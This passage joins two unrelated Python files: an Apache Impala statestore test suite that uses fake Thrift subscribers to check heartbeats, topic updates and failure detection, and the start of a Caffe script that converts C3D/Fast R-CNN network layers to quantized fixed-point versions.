  url = "http://{0}:{1}/subscribers?json".format(host, port)
  return json.loads(urllib2.urlopen(url).read())
# Shared "everything is fine" status used to build RPC responses below.
STATUS_OK = TStatus(TErrorCode.OK)
# Default reply for UpdateState(): OK status, no topic updates, not skipped.
DEFAULT_UPDATE_STATE_RESPONSE = TUpdateStateResponse(status=STATUS_OK, topic_updates=[],
                                                     skipped=False)

# IMPALA-3501: the timeout needs to be higher in code coverage builds
WAIT_FOR_FAILURE_TIMEOUT = specific_build_type_timeout(40, code_coverage_build_timeout=60)
class WildcardServerSocket(TSocket.TSocketBase, TTransport.TServerTransportBase):
  """Specialised server socket that binds to a random port at construction"""

  def __init__(self, host=None, port=0):
    # 'host' and 'port' are accepted for interface compatibility; the socket
    # always binds to an ephemeral port on localhost and records it in
    # self.port so callers can discover where to connect.
    self.host = host
    self.handle = None
    self.handle = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    self.handle.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    self.handle.bind(('localhost', 0))
    _, self.port = self.handle.getsockname()

  def listen(self):
    # Backlog of 128 pending connections.
    self.handle.listen(128)

  def accept(self):
    conn, _ = self.handle.accept()
    wrapped = TSocket.TSocket()
    wrapped.setHandle(conn)
    return wrapped
class KillableThreadedServer(TServer):
  """Based on TServer.TThreadedServer, this server may be shutdown (by calling
  shutdown()), after which no new connections may be made. Most of the implementation is
  directly copied from Thrift."""

  def __init__(self, *args, **kwargs):
    # Positional args are forwarded to TServer; 'daemon' controls whether the
    # per-connection handler threads are daemonised.
    TServer.__init__(self, *args)
    self.daemon = kwargs.get("daemon", False)
    self.is_shutdown = False
    self.port = self.serverTransport.port

  def shutdown(self):
    # Set the flag first so serve() exits its accept loop, then close the
    # listening transport and block until the port stops accepting.
    self.is_shutdown = True
    self.serverTransport.close()
    self.wait_until_down()

  def wait_until_up(self, num_tries=10):
    # Poll by attempting a real TCP connect; re-raise the last connect error
    # if the server never comes up.
    for i in xrange(num_tries):
      cnxn = TSocket.TSocket('localhost', self.port)
      try:
        cnxn.open()
        return
      except Exception, e:
        if i == num_tries - 1: raise
      time.sleep(0.1)

  def wait_until_down(self, num_tries=10):
    # Success here means the connect attempt failed, i.e. the server is down.
    for i in xrange(num_tries):
      cnxn = TSocket.TSocket('localhost', self.port)
      try:
        cnxn.open()
        time.sleep(0.1)
      except Exception, e:
        return
    raise Exception("Server did not stop")

  def serve(self):
    self.serverTransport.listen()
    while not self.is_shutdown:
      client = self.serverTransport.accept()
      # Since accept() can take a while, check again if the server is shutdown to avoid
      # starting an unnecessary thread.
      if self.is_shutdown: return
      t = threading.Thread(target=self.handle, args=(client,))
      t.setDaemon(self.daemon)
      t.start()

  def handle(self, client):
    # Per-connection handler: process requests until shutdown or disconnect.
    itrans = self.inputTransportFactory.getTransport(client)
    otrans = self.outputTransportFactory.getTransport(client)
    iprot = self.inputProtocolFactory.getProtocol(itrans)
    oprot = self.outputProtocolFactory.getProtocol(otrans)
    try:
      while not self.is_shutdown:
        self.processor.process(iprot, oprot)
    except TTransport.TTransportException, tx:
      # Normal client disconnect.
      pass
    except Exception, x:
      print x
    itrans.close()
    otrans.close()
class StatestoreSubscriber(object):
  """A bare-bones subscriber skeleton. Tests should create a new StatestoreSubscriber(),
  call start() and then register(). The subscriber will run a Thrift server on an unused
  port, and after registration the statestore will call Heartbeat() and UpdateState() via
  RPC. Tests can provide callbacks to the constructor that will be called during those
  RPCs, and this is the easiest way to check that the statestore protocol is being
  correctly followed. Tests should use wait_for_* methods to confirm that some event (like
  an RPC call) has happened asynchronously.

  Since RPC callbacks will execute on a different thread from the main one, any assertions
  there will not trigger a test failure without extra plumbing. What we do is simple: any
  exceptions during an RPC are caught and stored, and the check_thread_exceptions() method
  will re-raise them.

  The methods that may be called by a test deliberately return 'self' to allow for
  chaining, see test_failure_detected() for an example of how this makes the test flow
  more readable."""

  def __init__(self, heartbeat_cb=None, update_cb=None):
    # Condition guarding heartbeat_count; notified on every Heartbeat() RPC.
    self.heartbeat_event, self.heartbeat_count = threading.Condition(), 0
    # Track the number of updates received per topic.
    self.update_counts = defaultdict(lambda : 0)
    # Variables to notify for updates on each topic.
    self.update_event = threading.Condition()
    self.heartbeat_cb, self.update_cb = heartbeat_cb, update_cb
    # Unique id so concurrently running tests don't collide in the statestore.
    self.subscriber_id = "python-test-client-%s" % uuid.uuid1()
    # First exception raised on a callback thread; re-raised on the main
    # thread by check_thread_exceptions().
    self.exception = None

  def Heartbeat(self, args):
    """Heartbeat RPC handler. Calls heartbeat callback if one exists."""
    self.heartbeat_event.acquire()
    try:
      self.heartbeat_count += 1
      response = Subscriber.THeartbeatResponse()
      if self.heartbeat_cb is not None and self.exception is None:
        try:
          response = self.heartbeat_cb(self, args)
        except Exception, e:
          # Stash the exception for the main test thread to re-raise.
          self.exception = e
      self.heartbeat_event.notify()
    finally:
      self.heartbeat_event.release()
    return response

  def UpdateState(self, args):
    """UpdateState RPC handler. Calls update callback if one exists."""
    self.update_event.acquire()
    try:
      for topic_name in args.topic_deltas: self.update_counts[topic_name] += 1
      response = DEFAULT_UPDATE_STATE_RESPONSE
      if self.update_cb is not None and self.exception is None:
        try:
          response = self.update_cb(self, args)
        except Exception, e:
          # Print the original backtrace so it doesn't get lost.
          traceback.print_exc()
          self.exception = e
      self.update_event.notify()
    finally:
      self.update_event.release()
    return response

  def __init_server(self):
    # Stand up the Thrift server that the statestore will call back into.
    processor = Subscriber.Processor(self)
    transport = WildcardServerSocket()
    tfactory = TTransport.TBufferedTransportFactory()
    pfactory = TBinaryProtocol.TBinaryProtocolFactory()
    self.server = KillableThreadedServer(processor, transport, tfactory, pfactory,
                                         daemon=True)
    self.server_thread = threading.Thread(target=self.server.serve)
    self.server_thread.setDaemon(True)
    self.server_thread.start()
    self.server.wait_until_up()
    self.port = self.server.port

  def __init_client(self):
    # Client connection used to register with the statestore.
    # NOTE(review): assumes the statestore is listening on localhost:24000.
    self.client_transport = \
        TTransport.TBufferedTransport(TSocket.TSocket('localhost', 24000))
    self.protocol = TBinaryProtocol.TBinaryProtocol(self.client_transport)
    self.client = Statestore.Client(self.protocol)
    self.client_transport.open()

  def check_thread_exceptions(self):
    """Checks if an exception was raised and stored in a callback thread"""
    if self.exception is not None: raise self.exception

  def kill(self):
    """Closes both the server and client sockets, and waits for the server to become
    unavailable"""
    self.client_transport.close()
    self.server.shutdown()
    return self

  def start(self):
    """Starts a subscriber server, and opens a client to the statestore. Returns only when
    the server is running."""
    self.__init_server()
    self.__init_client()
    return self

  def register(self, topics=None):
    """Call the Register() RPC"""
    if topics is None: topics = []
    request = Subscriber.TRegisterSubscriberRequest(
      topic_registrations=topics,
      subscriber_location=TNetworkAddress("localhost", self.port),
      subscriber_id=self.subscriber_id)
    response = self.client.RegisterSubscriber(request)
    if response.status.status_code == TErrorCode.OK:
      self.registration_id = response.registration_id
    else:
      raise Exception("Registration failed: %s, %s" %
                      (response.status.status_code,
                       '\n'.join(response.status.error_msgs)))
    return self

  def wait_for_heartbeat(self, count=None):
    """Waits for some number of heartbeats. If 'count' is provided, waits until the number
    of heartbeats seen by this subscriber exceeds count, otherwise waits for one further
    heartbeat."""
    self.heartbeat_event.acquire()
    try:
      if count is not None and self.heartbeat_count >= count: return self
      if count is None: count = self.heartbeat_count + 1
      while count > self.heartbeat_count:
        self.check_thread_exceptions()
        last_count = self.heartbeat_count
        self.heartbeat_event.wait(10)
        # No progress during the 10s wait means the statestore went quiet.
        if last_count == self.heartbeat_count:
          raise Exception("Heartbeat not received within 10s (heartbeat count: %s)" %
                          self.heartbeat_count)
      self.check_thread_exceptions()
      return self
    finally:
      self.heartbeat_event.release()

  def wait_for_update(self, topic_name, count=None):
    """Waits for some number of updates of 'topic_name'. If 'count' is provided, waits
    until the number updates seen by this subscriber exceeds count, otherwise waits
    for one further update."""
    self.update_event.acquire()
    start_time = time.time()
    try:
      if count is not None and self.update_counts[topic_name] >= count: return self
      if count is None: count = self.update_counts[topic_name] + 1
      while count > self.update_counts[topic_name]:
        self.check_thread_exceptions()
        last_count = self.update_counts[topic_name]
        self.update_event.wait(10)
        # Unlike heartbeats, also require 10s of wall time to have elapsed
        # before declaring failure, since updates for other topics wake us.
        if (time.time() > start_time + 10 and
            last_count == self.update_counts[topic_name]):
          raise Exception("Update not received for %s within 10s (update count: %s)" %
                          (topic_name, last_count))
      self.check_thread_exceptions()
      return self
    finally:
      self.update_event.release()

  def wait_for_failure(self, timeout=WAIT_FOR_FAILURE_TIMEOUT):
    """Waits until this subscriber no longer appears in the statestore's subscriber
    list. If 'timeout' seconds pass, throws an exception."""
    start = time.time()
    while time.time() - start < timeout:
      subs = [s["id"] for s in get_statestore_subscribers()["subscribers"]]
      if self.subscriber_id not in subs: return self
      time.sleep(0.2)
    raise Exception("Subscriber %s did not fail in %ss" % (self.subscriber_id, timeout))
class TestStatestore():
  """End-to-end statestore behavior tests driven by fake in-process subscribers.

  Each test builds one or more StatestoreSubscriber instances (optionally with
  update/heartbeat callbacks), registers them with the running statestore, and
  then blocks on heartbeats/updates/failure detection to verify behavior.
  """

  def make_topic_update(self, topic_name, key_template="foo", value_template="bar",
                        num_updates=1, clear_topic_entries=False):
    """Builds a non-delta TTopicDelta for 'topic_name' containing 'num_updates'
    entries whose keys/values are the templates suffixed 0..num_updates-1."""
    topic_entries = [
      Subscriber.TTopicItem(key=key_template + str(x), value=value_template + str(x))
      for x in xrange(num_updates)]
    return Subscriber.TTopicDelta(topic_name=topic_name,
                                  topic_entries=topic_entries,
                                  is_delta=False,
                                  clear_topic_entries=clear_topic_entries)

  def test_registration_ids_different(self):
    """Test that if a subscriber with the same id registers twice, the registration ID is
    different"""
    sub = StatestoreSubscriber()
    sub.start().register()
    old_reg_id = sub.registration_id
    sub.register()
    assert old_reg_id != sub.registration_id

  def test_receive_heartbeats(self):
    """Smoke test to confirm that heartbeats get sent to a correctly registered
    subscriber"""
    sub = StatestoreSubscriber()
    sub.start().register().wait_for_heartbeat(5)

  def test_receive_updates(self):
    """Test that updates are correctly received when a subscriber alters a topic"""
    topic_name = "topic_delta_%s" % uuid.uuid1()

    def topic_update_correct(sub, args):
      delta = self.make_topic_update(topic_name)
      update_count = sub.update_counts[topic_name]
      if topic_name not in args.topic_deltas:
        # The update doesn't contain our topic.
        pass
      elif update_count == 1:
        # First update: publish our entries to the topic.
        return TUpdateStateResponse(status=STATUS_OK, topic_updates=[delta],
                                    skipped=False)
      elif update_count == 2:
        # Second update must echo back exactly what we published.
        assert len(args.topic_deltas) == 1, args.topic_deltas
        assert args.topic_deltas[topic_name].topic_entries == delta.topic_entries
        assert args.topic_deltas[topic_name].topic_name == delta.topic_name
      elif update_count == 3:
        # After the content-bearing update was processed, the next delta should be empty
        assert len(args.topic_deltas[topic_name].topic_entries) == 0
      return DEFAULT_UPDATE_STATE_RESPONSE

    sub = StatestoreSubscriber(update_cb=topic_update_correct)
    reg = TTopicRegistration(topic_name=topic_name, is_transient=False)
    (
      sub.start()
         .register(topics=[reg])
         .wait_for_update(topic_name, 3)
    )

  def test_update_is_delta(self):
    """Test that the 'is_delta' flag is correctly set. The first update for a topic should
    always not be a delta, and so should all subsequent updates until the subscriber says
    it has not skipped the update."""
    topic_name = "test_update_is_delta_%s" % uuid.uuid1()

    def check_delta(sub, args):
      update_count = sub.update_counts[topic_name]
      if topic_name not in args.topic_deltas:
        # The update doesn't contain our topic.
        pass
      elif update_count == 1:
        # Very first update for the topic must be a full (non-delta) one.
        assert args.topic_deltas[topic_name].is_delta == False
        delta = self.make_topic_update(topic_name)
        return TUpdateStateResponse(status=STATUS_OK, topic_updates=[delta],
                                    skipped=False)
      elif update_count == 2:
        # Still non-delta: the statestore has not yet processed our response.
        assert args.topic_deltas[topic_name].is_delta == False
      elif update_count == 3:
        # Our entry was accepted; subsequent updates are (empty) deltas.
        assert args.topic_deltas[topic_name].is_delta == True
        assert len(args.topic_deltas[topic_name].topic_entries) == 0
        assert args.topic_deltas[topic_name].to_version == 1
      return DEFAULT_UPDATE_STATE_RESPONSE

    sub = StatestoreSubscriber(update_cb=check_delta)
    reg = TTopicRegistration(topic_name=topic_name, is_transient=False)
    (
      sub.start()
         .register(topics=[reg])
         .wait_for_update(topic_name, 3)
    )

  def test_skipped(self):
    """Test that skipping an update causes it to be resent"""
    topic_name = "test_skipped_%s" % uuid.uuid1()

    def check_skipped(sub, args):
      # Ignore responses that don't contain our topic.
      if topic_name not in args.topic_deltas: return DEFAULT_UPDATE_STATE_RESPONSE
      update_count = sub.update_counts[topic_name]
      if update_count == 1:
        update = self.make_topic_update(topic_name)
        return TUpdateStateResponse(status=STATUS_OK, topic_updates=[update],
                                    skipped=False)
      # All subsequent updates: set skipped=True and expected the full topic to be resent
      # every time
      assert args.topic_deltas[topic_name].is_delta == False
      assert len(args.topic_deltas[topic_name].topic_entries) == 1
      return TUpdateStateResponse(status=STATUS_OK, skipped=True)

    sub = StatestoreSubscriber(update_cb=check_skipped)
    reg = TTopicRegistration(topic_name=topic_name, is_transient=False)
    (
      sub.start()
         .register(topics=[reg])
         .wait_for_update(topic_name, 3)
    )

  def test_failure_detected(self):
    """Test that killing a subscriber causes the statestore to eventually drop
    it from the subscriber set."""
    sub = StatestoreSubscriber()
    topic_name = "test_failure_detected"
    reg = TTopicRegistration(topic_name=topic_name, is_transient=True)
    (
      sub.start()
         .register(topics=[reg])
         .wait_for_update(topic_name, 1)
         .kill()
         .wait_for_failure()
    )

  def test_hung_heartbeat(self):
    """Test for IMPALA-1712: If heartbeats hang (which we simulate by sleeping for five
    minutes) the statestore should time them out every 3s and then eventually fail after
    40s (10 times (3 + 1), where the 1 is the inter-heartbeat delay)"""
    sub = StatestoreSubscriber(heartbeat_cb=lambda sub, args: time.sleep(300))
    topic_name = "test_hung_heartbeat"
    reg = TTopicRegistration(topic_name=topic_name, is_transient=True)
    (
      sub.start()
         .register(topics=[reg])
         .wait_for_update(topic_name, 1)
         .wait_for_failure(timeout=60)
    )

  def test_topic_persistence(self):
    """Test that persistent topic entries survive subscriber failure, but transent topic
    entries are erased when the associated subscriber fails"""
    topic_id = str(uuid.uuid1())
    persistent_topic_name = "test_topic_persistence_persistent_%s" % topic_id
    transient_topic_name = "test_topic_persistence_transient_%s" % topic_id

    def add_entries(sub, args):
      # None of, one or both of the topics may be in the update.
      updates = []
      if (persistent_topic_name in args.topic_deltas and
          sub.update_counts[persistent_topic_name] == 1):
        updates.append(self.make_topic_update(persistent_topic_name))
      if (transient_topic_name in args.topic_deltas and
          sub.update_counts[transient_topic_name] == 1):
        updates.append(self.make_topic_update(transient_topic_name))
      if len(updates) > 0:
        return TUpdateStateResponse(status=STATUS_OK, topic_updates=updates,
                                    skipped=False)
      return DEFAULT_UPDATE_STATE_RESPONSE

    def check_entries(sub, args):
      # None of, one or both of the topics may be in the update.
      if (persistent_topic_name in args.topic_deltas and
          sub.update_counts[persistent_topic_name] == 1):
        assert len(args.topic_deltas[persistent_topic_name].topic_entries) == 1
        # Statestore should not send deletions when the update is not a delta, see
        # IMPALA-1891
        assert args.topic_deltas[persistent_topic_name].topic_entries[0].deleted == False
      # BUG FIX: the guard previously checked update_counts[persistent_topic_name],
      # a copy-paste error -- the transient topic's own count must gate this assert.
      if (transient_topic_name in args.topic_deltas and
          sub.update_counts[transient_topic_name] == 1):
        # Transient entries must have been erased with the failed subscriber.
        assert len(args.topic_deltas[transient_topic_name].topic_entries) == 0
      return DEFAULT_UPDATE_STATE_RESPONSE

    reg = [TTopicRegistration(topic_name=persistent_topic_name, is_transient=False),
           TTopicRegistration(topic_name=transient_topic_name, is_transient=True)]
    sub = StatestoreSubscriber(update_cb=add_entries)
    (
      sub.start()
         .register(topics=reg)
         .wait_for_update(persistent_topic_name, 2)
         .wait_for_update(transient_topic_name, 2)
         .kill()
         .wait_for_failure()
    )
    sub2 = StatestoreSubscriber(update_cb=check_entries)
    (
      sub2.start()
          .register(topics=reg)
          .wait_for_update(persistent_topic_name, 1)
          .wait_for_update(transient_topic_name, 1)
    )

  def test_update_with_clear_entries_flag(self):
    """Test that the statestore clears all topic entries when a subscriber
    sets the clear_topic_entries flag in a topic update message (IMPALA-6948)."""
    topic_name = "test_topic_%s" % str(uuid.uuid1())

    def add_entries(sub, args):
      updates = []
      if (topic_name in args.topic_deltas and sub.update_counts[topic_name] == 1):
        updates.append(self.make_topic_update(topic_name, num_updates=2,
                                              key_template="old"))
      if (topic_name in args.topic_deltas and sub.update_counts[topic_name] == 2):
        updates.append(self.make_topic_update(topic_name, num_updates=1,
                                              key_template="new", clear_topic_entries=True))
      if len(updates) > 0:
        return TUpdateStateResponse(status=STATUS_OK, topic_updates=updates,
                                    skipped=False)
      return DEFAULT_UPDATE_STATE_RESPONSE

    def check_entries(sub, args):
      if (topic_name in args.topic_deltas and sub.update_counts[topic_name] == 1):
        # Only the post-clear entry should remain.
        assert len(args.topic_deltas[topic_name].topic_entries) == 1
        assert args.topic_deltas[topic_name].topic_entries[0].key == "new0"
      return DEFAULT_UPDATE_STATE_RESPONSE

    reg = [TTopicRegistration(topic_name=topic_name, is_transient=False)]
    sub1 = StatestoreSubscriber(update_cb=add_entries)
    (
      sub1.start()
          .register(topics=reg)
          .wait_for_update(topic_name, 1)
          .kill()
          .wait_for_failure()
          .start()
          .register(topics=reg)
          .wait_for_update(topic_name, 1)
    )
    sub2 = StatestoreSubscriber(update_cb=check_entries)
    (
      sub2.start()
          .register(topics=reg)
          .wait_for_update(topic_name, 2)
    )

  def test_heartbeat_failure_reset(self):
    """Regression test for IMPALA-6785: the heartbeat failure count for the subscriber ID
    should be reset when it resubscribes, not after the first successful heartbeat. Delay
    the heartbeat to force the topic update to finish first."""
    sub = StatestoreSubscriber(heartbeat_cb=lambda sub, args: time.sleep(0.5))
    topic_name = "test_heartbeat_failure_reset"
    reg = TTopicRegistration(topic_name=topic_name, is_transient=True)
    sub.start()
    sub.register(topics=[reg])
    LOG.info("Registered with id {0}".format(sub.subscriber_id))
    sub.wait_for_heartbeat(1)
    sub.kill()
    LOG.info("Killed, waiting for statestore to detect failure via heartbeats")
    sub.wait_for_failure()
    # IMPALA-6785 caused only one topic update to be send. Wait for multiple updates to
    # be received to confirm that the subsequent updates are being scheduled repeatedly.
    target_updates = sub.update_counts[topic_name] + 5
    sub.start()
    sub.register(topics=[reg])
    LOG.info("Re-registered with id {0}, waiting for update".format(sub.subscriber_id))
    sub.wait_for_update(topic_name, target_updates)
|
quantize_c3d.py | #!/usr/bin/env python
# --------------------------------------------------------
# Quantize Fast R-CNN based Network
# Written by Chia-Chi Tsai
# --------------------------------------------------------
"""Quantize a Fast R-CNN network on an image database."""
import os
os.environ['GLOG_minloglevel'] = '2'
import _init_paths
from fast_rcnn.test import test_net, test_net_silent, im_detect
from fast_rcnn.config import cfg, cfg_from_file, cfg_from_list
from datasets.factory import get_imdb
import caffe
import argparse
import pprint
import time, os, sys
import numpy as np
from caffe.proto import caffe_pb2
import google.protobuf.text_format as txtf
import math
import cv2
from utils.timer import Timer
import multiprocessing
import json
import shutil
import warnings
warnings.filterwarnings("ignore")
from utils.timer import Timer
from subprocess import check_output
def parse_args():
    """Parse command-line arguments for the C3D quantization tool.

    Prints usage and exits with status 1 when invoked with no arguments at all.
    Returns the parsed argparse.Namespace.
    """
    parser = argparse.ArgumentParser(description='Quantize a C3D network')
    parser.add_argument('--gpu', dest='gpu_id', type=int, default=0,
                        help='GPU id to use')
    parser.add_argument('--def', dest='prototxt', type=str, default=None,
                        help='prototxt file defining the network')
    parser.add_argument('--def_quant', dest='prototxt_quantized', type=str,
                        default=None,
                        help='quantized prototxt file defining the network')
    parser.add_argument('--def_quant_BAC', dest='prototxt_quantized_BAC', type=str,
                        default=None,
                        help='quantized prototxt file defining the network')
    parser.add_argument('--act_analysis', dest='act_analysis', type=str,
                        default=None,
                        help='input and output analysis file')
    parser.add_argument('--accumulator_analysis', dest='accumulator_analysis',
                        type=str, default=None,
                        help='adder and multiplier analysis file')
    parser.add_argument('--net', dest='caffemodel', type=str, default=None,
                        help='model to test')
    parser.add_argument('--cfg', dest='cfg_file', type=str, default=None,
                        help='optional config file')
    parser.add_argument('--imdb', dest='imdb_name', type=str,
                        default='voc_2007_test',
                        help='dataset to test')
    parser.add_argument('--comp', dest='comp_mode', action='store_true',
                        help='competition mode')
    parser.add_argument('--set', dest='set_cfgs', default=None,
                        nargs=argparse.REMAINDER,
                        help='set config keys')
    parser.add_argument('--video', dest='video', type=str,
                        default='RearGoProDay97.mp4',
                        help='video')
    parser.add_argument('--vis', dest='vis', action='store_true',
                        help='visualize detections')
    parser.add_argument('--num_dets', dest='max_per_image', type=int, default=100,
                        help='max number of detections per image')
    parser.add_argument('--error_margin', dest='error_margin', type=float,
                        default=0.1,
                        help='tolerance error of quantized network')

    # No arguments at all: show usage and bail out.
    if len(sys.argv) == 1:
        parser.print_help()
        sys.exit(1)
    return parser.parse_args()
def analyze_network(net_proto):
    """Report which quantizable layer kinds appear in 'net_proto'.

    Returns a tuple of booleans (has_conv, has_deconv, has_fc, has_ndconv).
    """
    layer_types = set(layer.type for layer in net_proto.layer)
    has_conv = 'Convolution' in layer_types
    has_deconv = 'Deconvolution' in layer_types
    has_fc = 'InnerProduct' in layer_types
    has_ndconv = 'NdConvolution' in layer_types
    return has_conv, has_deconv, has_fc, has_ndconv
# convert network to quantized network with 32 bit width
def convert_net_to_qnet(ori_net_path, q_net_path):
    """Rewrite the prototxt at 'ori_net_path' into a quantization-ready network
    and write the result to 'q_net_path'.

    Two transformations are applied:
      1. In-place blobs are split: whenever a layer's top name equals one of its
         bottom names, the top is renamed by appending '/t' (repeatedly for
         chains of in-place layers), and later consumers of the old name are
         rewired to the newest renamed blob.
      2. Convolution/InnerProduct/Deconvolution/NdConvolution layers are swapped
         to their quantization-aware layer types, initialized to 32-bit
         dynamic-fixed-point with 16 fractional bits everywhere.
    """
    net_proto = read_from_prototxt(ori_net_path)
    # Maps an original blob name to its most recent '/t'-suffixed replacement.
    new_blob_name = {}
    for l in net_proto.layer:
        for i in range(len(l.top)):
            for j in range(len(l.bottom)):
                if l.top[i] == l.bottom[j]:
                    # In-place layer: give the top a fresh '/t' alias.
                    if not l.top[i] in new_blob_name.keys():
                        new_blob_name[l.top[i]] = l.top[i] + '/t'
                    else:
                        # Seen before: consume the latest alias as this layer's
                        # input and extend the alias chain with another '/t'.
                        l.bottom[j] = new_blob_name[l.bottom[j]]
                        new_blob_name[l.top[i]] = new_blob_name[l.top[i]] + '/t'
                    l.top[i] = new_blob_name[l.top[i]]
                else:
                    # Not in-place: rewire any bottom that refers to a renamed blob.
                    for k in range(len(l.bottom)):
                        if l.bottom[k] in new_blob_name.keys():
                            l.bottom[k] = new_blob_name[l.bottom[k]]
        # Swap supported layer types to their quantization-aware counterparts.
        # precision 0 == DYNAMIC_FIXED_POINT; rounding_time 0 presumably selects
        # train/inference-time rounding in the Ristretto fork -- confirm.
        if l.type == 'Convolution':
            l.type = 'ConvolutionIVS'
            l.quantization_param.precision = 0  # DYNAMIC_FIXED_POINT
            l.quantization_param.bw_layer_in = 32
            l.quantization_param.bw_layer_out = 32
            l.quantization_param.bw_params = 32
            l.quantization_param.fl_layer_in = 16
            l.quantization_param.fl_layer_out = 16
            l.quantization_param.fl_params = 16
            l.quantization_param.rounding_time = 0
        elif l.type == 'InnerProduct':
            l.type = 'FcIVS'
            l.quantization_param.precision = 0  # DYNAMIC_FIXED_POINT
            l.quantization_param.bw_layer_in = 32
            l.quantization_param.bw_layer_out = 32
            l.quantization_param.bw_params = 32
            l.quantization_param.fl_layer_in = 16
            l.quantization_param.fl_layer_out = 16
            l.quantization_param.fl_params = 16
            l.quantization_param.rounding_time = 0
        elif l.type == 'Deconvolution':
            l.type = 'DeconvolutionRistretto'
            l.quantization_param.precision = 0  # DYNAMIC_FIXED_POINT
            l.quantization_param.bw_layer_in = 32
            l.quantization_param.bw_layer_out = 32
            l.quantization_param.bw_params = 32
            l.quantization_param.fl_layer_in = 16
            l.quantization_param.fl_layer_out = 16
            l.quantization_param.fl_params = 16
            l.quantization_param.rounding_time = 0
        elif l.type == 'NdConvolution':
            l.type = 'NdConvolutionIVS'
            l.quantization_param.precision = 0  # DYNAMIC_FIXED_POINT
            l.quantization_param.bw_layer_in = 32
            l.quantization_param.bw_layer_out = 32
            l.quantization_param.bw_params = 32
            l.quantization_param.fl_layer_in = 16
            l.quantization_param.fl_layer_out = 16
            l.quantization_param.fl_params = 16
            l.quantization_param.rounding_time = 0
    write_to_prototxt(net_proto, q_net_path)
# convert network to quantized network with 32 bit width
def convert_net_to_qnet_BAC_analysis(ori_net_path, q_net_path):
    """Rewrite the prototxt at 'ori_net_path' for bit-accurate accumulator
    analysis and write it to 'q_net_path'.

    Performs the same in-place-blob renaming as convert_net_to_qnet, then puts
    every Convolution/ConvolutionIVS and InnerProduct/FcIVS layer into analyze
    mode (analyze_mode = 3) with 32-bit adders/multipliers (16 fractional bits)
    so the accumulator statistics can be measured on a forward pass.
    """
    net_proto = read_from_prototxt(ori_net_path)
    # Maps an original blob name to its most recent '/t'-suffixed replacement.
    new_blob_name = {}
    for l in net_proto.layer:
        for i in range(len(l.top)):
            for j in range(len(l.bottom)):
                if l.top[i] == l.bottom[j]:
                    # In-place layer: give the top a fresh '/t' alias.
                    if not l.top[i] in new_blob_name.keys():
                        new_blob_name[l.top[i]] = l.top[i] + '/t'
                    else:
                        l.bottom[j] = new_blob_name[l.bottom[j]]
                        new_blob_name[l.top[i]] = new_blob_name[l.top[i]] + '/t'
                    l.top[i] = new_blob_name[l.top[i]]
                else:
                    # Not in-place: rewire bottoms that refer to renamed blobs.
                    for k in range(len(l.bottom)):
                        if l.bottom[k] in new_blob_name.keys():
                            l.bottom[k] = new_blob_name[l.bottom[k]]
        # Accepts both raw and already-converted type names.
        if l.type == 'Convolution' or l.type == 'ConvolutionIVS':
            l.type = 'ConvolutionIVS'
            l.quantization_param.precision = 0  # DYNAMIC_FIXED_POINT
            l.quantization_param.bw_add = 32
            l.quantization_param.bw_multiply = 32
            l.quantization_param.fl_add = 16
            l.quantization_param.fl_multiply = 16
            l.quantization_param.rounding_time = 1
            l.quantization_param.analyze_mode = 3
        if l.type == 'InnerProduct' or l.type == 'FcIVS':
            l.type = 'FcIVS'
            l.quantization_param.precision = 0  # DYNAMIC_FIXED_POINT
            l.quantization_param.bw_add = 32
            l.quantization_param.bw_multiply = 32
            l.quantization_param.fl_add = 16
            l.quantization_param.fl_multiply = 16
            l.quantization_param.rounding_time = 1
            l.quantization_param.analyze_mode = 3
    write_to_prototxt(net_proto, q_net_path)
def convert_net_to_qnet_BAC(ori_net_path, q_net_path):
    """Rewrite the prototxt at 'ori_net_path' for bit-accurate computation
    (analysis disabled) and write it to 'q_net_path'.

    Performs the same in-place-blob renaming as convert_net_to_qnet, then turns
    off analyze mode (analyze_mode = 0) on every Convolution/ConvolutionIVS and
    InnerProduct/FcIVS layer while keeping bit-accurate rounding
    (rounding_time = 1). Other quantization fields are left as-is.
    """
    net_proto = read_from_prototxt(ori_net_path)
    # Maps an original blob name to its most recent '/t'-suffixed replacement.
    new_blob_name = {}
    for l in net_proto.layer:
        for i in range(len(l.top)):
            for j in range(len(l.bottom)):
                if l.top[i] == l.bottom[j]:
                    # In-place layer: give the top a fresh '/t' alias.
                    if not l.top[i] in new_blob_name.keys():
                        new_blob_name[l.top[i]] = l.top[i] + '/t'
                    else:
                        l.bottom[j] = new_blob_name[l.bottom[j]]
                        new_blob_name[l.top[i]] = new_blob_name[l.top[i]] + '/t'
                    l.top[i] = new_blob_name[l.top[i]]
                else:
                    # Not in-place: rewire bottoms that refer to renamed blobs.
                    for k in range(len(l.bottom)):
                        if l.bottom[k] in new_blob_name.keys():
                            l.bottom[k] = new_blob_name[l.bottom[k]]
        if l.type == 'Convolution' or l.type == 'ConvolutionIVS':
            l.type = 'ConvolutionIVS'
            l.quantization_param.analyze_mode = 0
            l.quantization_param.rounding_time = 1
        if l.type == 'InnerProduct' or l.type == 'FcIVS':
            l.type = 'FcIVS'
            l.quantization_param.analyze_mode = 0
            l.quantization_param.rounding_time = 1
    write_to_prototxt(net_proto, q_net_path)
#change single layer bit width
def change_layer_bw(net_proto, layer_name,
                    bw_layer_in, fl_layer_in,
                    bw_layer_out, fl_layer_out,
                    bw_params, fl_params,
                    bw_add, fl_add,
                    bw_multiply, fl_multiply):
    """Set the full quantization spec (bit widths and fractional lengths for
    input, output, params, adder and multiplier) on the layer named
    'layer_name'. Returns the mutated net_proto."""
    for layer in net_proto.layer:
        if layer.name != layer_name:
            continue
        qp = layer.quantization_param
        qp.precision = 0  # DYNAMIC_FIXED_POINT
        qp.bw_layer_in = int(bw_layer_in)
        qp.bw_layer_out = int(bw_layer_out)
        qp.bw_params = int(bw_params)
        qp.bw_add = int(bw_add)
        qp.bw_multiply = int(bw_multiply)
        qp.fl_layer_in = int(fl_layer_in)
        qp.fl_layer_out = int(fl_layer_out)
        qp.fl_params = int(fl_params)
        qp.fl_add = int(fl_add)
        qp.fl_multiply = int(fl_multiply)
    return net_proto
def change_layer_BAC_bw(net_proto, layer_name,
                        bw_add, fl_add,
                        bw_multiply, fl_multiply):
    """Set only the bit-accurate accumulator fields (adder and multiplier bit
    widths / fractional lengths) of the layer named 'layer_name'. Returns the
    mutated net_proto.

    Fixes two typos that made the original unusable: the second parameter was
    misspelled 'lVayer_name' while the body read 'layer_name' (NameError), and
    the multiplier fractional length was read from the undefined 'fw_multiply'
    instead of 'fl_multiply'.
    """
    for l in net_proto.layer:
        if l.name == layer_name:
            l.quantization_param.bw_add = bw_add
            l.quantization_param.fl_add = fl_add
